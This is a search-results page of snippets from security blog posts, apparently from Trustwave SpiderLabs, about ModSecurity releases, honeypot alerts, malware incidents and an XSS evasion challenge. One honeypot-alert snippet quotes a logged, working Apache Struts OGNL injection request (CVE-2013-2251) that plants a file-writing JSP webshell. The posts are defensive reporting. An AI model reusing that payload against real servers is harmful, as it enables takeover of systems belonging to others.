Showing 332 results for: ModSecurity ×

WordPress XML-RPC PingBack Vulnerability Analysis

There were news stories this week outlining how attackers are abusing the XML-PRC "pingback" feature of WordPress blog sites to launch DDoS attacks on other sites. This blog post will provide some analysis on this attack and additional information for...

Introducing ModSecurity Status Reporting

The Trustwave SpiderLabs Research team is committed to making ModSecurity the best open source WAF possible. To this end, we have deployed Buildbot platforms and revamped regression tests for our different ports to ensure code quality and reliability. But we...

Announcing ModSecurity v2.7.6 Release (CI Platform Usage)

The ModSecurity Project team is pleased to announce public release version 2.7.6. Full Release Notes Here. Besides extensive bug fixes this release also includes modification on the build system that counts on QA mechanisms such as coding style checker and...

[Honeypot Alert] More PHP-CGI Scanning (apache-magika.c)

In the past 24 hours, one of the WASC Distributed Web Honeypot participant's sensors picked up continued scanning for CVE-2012-1823 which is a vulnerability within PHP-CGI. Here is a screenshot taken from the ModSecurity WAF alert data: PHP-CGI Attack The...

PHP.Net Site Infected with Malware

Earlier today, users attempting to access the www.php.net site were met with malware warnings from Google's Safe Browsing plugins in Chrome/FireFox and other browsers - So, what was the problem? Malware Redirection Details Google's SafeBrowsing currently lists the following for...

Hiding Webshell Backdoor Code in Image Files

Looks Can Be Deceiving Do any of these pictures look suspicious? First appearances may be deceiving... Web attackers have have been using a method of stashing pieces of their PHP backdoor exploit code within the meta-data headers of these image...

ModSecurity for Java - BETA Testers Needed

Over the course of the summer of 2013, the ModSecurity team participated in Google's Summer of Code (GSoC) program through OWASP. We helped by mentoring Mihai Pitu who developed a port of ModSecurity for Java! The main problem this project...

ModSecurity XSS Evasion Challenge Results

On July 30th, we announced our public ModSecurity XSS Evasion Challenge. This blog post will provide an overview of the challenge and results. Value of Community Testing First of all, I would like to thank all those people that participated...

[Honeypot Alert] Probes for Apache Struts 2.X OGNL Vulnerability

Today our web honeypot sensors picked up probes for the recent Apache Struts 2.X OGNL vulnerability (CVE-2013-2251): 222.136.0.151 - - [16/Aug/2013:09:25:21 +0200] "GET /index.action? redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest' ),%23p%3d(%23req.getRealPath(%22/%22)%2b%22inback.jsp%22).replaceAll(\"\\\\\\\\\",%20\"/\" ),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c %22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull) (new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%2 2f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e HTTP/1.1" 404 291 "-" "Sturt2" Struts users are strongly encouraged...

Announcing the ModSecurity XSS Evasion Challenge

The SpiderLabs Research Team is pleased to announce the release of the ModSecurity XSS Evasion Challenge for the community. The purpose of this challenge is to show possible XSS defenses by using ModSecurity and to identify any weaknesses. Challenge Setup...